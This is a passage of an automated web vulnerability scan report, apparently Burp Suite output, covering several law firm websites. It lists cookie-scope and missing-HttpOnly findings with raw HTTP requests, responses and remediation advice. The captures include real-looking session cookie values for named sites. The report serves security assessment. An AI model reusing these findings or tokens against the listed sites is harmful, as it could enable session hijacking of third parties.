GET /news/act_ticker_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/news/newsTicker.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
<images>
<item> <news>Fulbright Partner Named Best FCPA Lawyer Outside of D.C.</news> <url>http://www.fulbright.com/index.cfm?fuseaction=news.detail&article_id=9405&site_id=286< ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newsTicker.swf HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/dc Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:46 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /offices HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:51:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1160%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:51:14 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rss HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1602%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /seminars/act_eventbanner_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/events/eventsBanner_03.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /technology HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D393%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
...[SNIP]...
7. Cookie without HttpOnly flag setpreviousnext There are 63 instances of this issue:
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.arnoldporter.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18263646;expires=Fri, 11-Jan-2041 15:08:47 GMT;path=/ Set-Cookie: CFTOKEN=41801191;expires=Fri, 11-Jan-2041 15:08:47 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /showoffice.aspx HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 19 Jan 2011 15:48:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /404.aspx?error=500 Set-Cookie: ASP.NET_SessionId=ld121hju5gt2vlvrg5m2cm45; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 136
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='/404.aspx?error=500'>here</a>.</h2> </body></html>
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A31%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D512%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:49:31 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dc HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFTOKEN=35971701;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A41%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A40%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.political.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 16:55:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title>Covington Political Broadcasting Law</title ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18263656;expires=Fri, 11-Jan-2041 15:08:55 GMT;path=/ Set-Cookie: CFTOKEN=43582841;expires=Fri, 11-Jan-2041 15:08:55 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /404.aspx HTTP/1.1 Host: jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=21182496.1295451935.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/21; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; DefaultCulture=en-US; NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660; __utma=21182496.1025166527.1295451935.1295451935.1295451935.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=21182496; __utmb=21182496.2.10.1295451935; ASP.NET_SessionId=frpmkd55p5dmxt55rnepogqw; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; SiteId=0;
The following cookie was issued by the application and does not have the HttpOnly flag set:
DefaultCulture=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fca/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sec/ HTTP/1.1 Host: skaddenpractices.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sec/scripts/resize.gif HTTP/1.1 Host: skaddenpractices.skadden.com Proxy-Connection: keep-alive Referer: http://skaddenpractices.skadden.com/sec/index.php?7ae3b Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; Apache=173.193.214.243.1295460913738647; FRONTSKADDENSEC=d6220a6c3fc3ed10bcec7baef1e6e630
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.cov.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /en-US/regions/middle_east/ HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The following cookie was issued by the application and does not have the HttpOnly flag set:
DefaultCulture=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /health_care/health_care_reform/ HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /industry/financial_services/dodd_frank/ HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ja-JP/practice/region.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ko-KR/practice/region.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2fError.html%3faspxerrorpath%3d%2fFCWSite%2fFeatures%2fServices%2fregion.aspx">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/detail.aspx HTTP/1.1 Host: www.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
